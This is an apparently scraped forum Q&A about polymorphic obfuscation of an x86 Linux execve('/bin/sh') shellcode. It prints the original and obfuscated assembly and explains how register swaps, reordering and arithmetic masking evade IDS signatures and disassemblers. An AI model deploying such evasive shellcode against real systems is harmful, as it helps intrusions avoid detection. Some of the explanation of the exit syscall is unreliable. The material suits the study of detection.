Explained polymorphic obfuscation using the difference within two asm codes

2018-07-02 05:37:08

Here are two asm codes (copied from this forum polymorphic-shellcode):

orginal asm before obfuscation:

global _start
section .text
_start
    xor    eax,eax
    push   eax
    push   dword 0x68732f2f     ; //sh
    push   dword 0x6e69622f     ; /bin
    mov    ebx,esp
    mov    ecx,eax
    mov    edx,eax
    mov    al,0xb               ; execve()
    int    0x80
    xor    eax,eax
    inc    eax
    int    0x80

revised asm after obfuscation:

global _start           
section .text
_start:
    xor edx, edx            ;line 1
    push edx                ;line 2
    mov eax, 0x563ED8B7     ;line 3
    add eax, 0x12345678     ;line 4
    push eax                ;line 5
    mov eax, 0xDEADC0DE     ;line 6
    sub eax, 0x70445EAF     ;line 7
    push eax                ;line 8
    push byte 0xb           ;line 9
    pop eax                 ;line 10
    mov ecx, edx            ;line 11
    mov ebx, esp            ;line 12
    push byte 0x1           ;line 13
    pop esi                 ;line 14
    int 0x80                ;line 15
    xchg esi, eax           ;line 16
    int 0x80                ;line 17

It makes four changes:

1. Mask the /bin/sh string by doing arithmetic operations instead of pushing the hex values into the stack directly.

Q1.1: I can understand line 3 to 8 (in revised asm). what means line 9? equals to "mov al,0xb" in original asm?

2. Use different registers than the original code where possible.

Q2.1: for example, line 1 and 2 (revised asm) refers to this?

Q2.2: i understand obfuscation as let IDS cannot match keywords, why change registers?

3. Reorder instructions. Don't initialize the registers in the same order before calling execve.

Q3.1: I do not understand this. Explain it using above two asm.

4. Introduce some unnecessary steps. eg: push byte 0x1; pop esi; xchg esi,eax instead of popping to eax after the first int 0x80 instruction is executed.

Q4.1: In the original asm, why there are two int 0x80? I have tried to delete the last 0x80, it still works. Q4.2: Is add unnecessary steps directly related to obfuscation??

Q5: why "pop eax" in line 10?

Q1.1: I can understand line 3 to 8 (in revised asm). what means line 9? equals to "mov al,0xb" in original asm?

Line 9 and 10 do push byte 0xb, pop eax , which obviously translates to mov eax,0x0000000b . Because x86 is little endian this fills al with 0xb (and the rest of the eax register with zero's). So it's actually replacing the xor eax,eax / mov al,0xb combination.

push 0xb -> mov [ss:esp],0x0000000b ; memory at SS:ESP = 0x0000000b
pop eax  -> mov eax,[ss:esp]        ; ergo eax = 0x0000000b

Q2.2: i understand obfuscation as let IDS cannot match keywords, why change registers?

Many compilers use registers in a more or less standard manner. An advanced program like IDA-pro (or an IDS) can use this knowledge to decompile the assembly back to readable source code, provided that it can deduce the exact compiler version used to create the program. By mixing up registers it makes it harder for a decompiler to translate the assembly code to higher level (pseudo) source code. The same goes for an IDS which uses known code snippets to deduce what actions a program performs.

Reorder instructions. Don't initialize the registers in the same order before calling execve. Q3.1: I do not understand this. Explain it using above two asm.

If you use system calls, it is relatively easy to deduce what actions an application is performing. Linux (for example) stores the call# in eax and every call has specified parameters in predetermined registers. By making it difficult for an analysis program to determine the value of eax it becomes unclear which system call is being executed. Without this knowledge the meaning of the other registers (read: parameters) cannot be known. If you fill non-used registers with nonsense values as well then things become even harder to interpret.

The obfuscater does not want you to know it is calling syscall #11 (execve). The only way to do this is to try to load eax with 0xb in a round-about manner. If we always load eax last (or first), then it becomes easier to figure out what is going on. If we load eax using 2 or more instructions, and we put lots of unrelated instructions in between, then it becomes harder to track the final value of eax before the int 0x80 which performs the syscall.

Q4.1: In the original asm, why there are two int 0x80 ? I have tried to delete the last 0x80, it still works. Q4.2: Is add unnecessary steps directly related to obfuscation??

No, previous syscall to (execve) loads 1 into eax upon successful return. Syscall #1 happens to be sys_exit , which cleanly closes the program. When injecting the code into a program, the bytes after the inserted snippet are random garbage, we don't want to execute those and must thus exit the thread cleanly. The call to sys_exit achieves this.
If you assemble this snippet as a stand-alone program, the assembler will append a sys_exit call for you. This is why removing the last int 0x80 seems to make no difference.

Q5: why "pop eax" in line 10?

First a 0xb is push ed, then it is pop ed into eax , essentially performing a mov eax,0xb .

链接地址: http://www.djcxy.com/p/89858.html

上一篇: Google云端硬盘前端界面事件侦听器

下一篇: 使用两个asm代码中的差异来解释多态混淆